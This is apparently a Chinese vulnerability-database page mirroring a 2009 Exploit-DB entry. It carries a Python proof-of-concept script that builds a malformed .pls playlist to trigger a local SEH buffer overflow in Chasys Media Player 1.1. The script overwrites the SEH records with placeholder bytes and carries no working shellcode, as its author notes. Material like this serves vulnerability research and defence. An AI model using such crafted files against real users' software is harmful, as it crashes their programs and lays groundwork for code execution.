Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057574 漏洞类型
发布时间 2009-03-18 更新时间 2009-03-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8232
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print "  Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print "  Discovered By : zAx"
print "  Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()

# milw0rm.com [2009-03-18]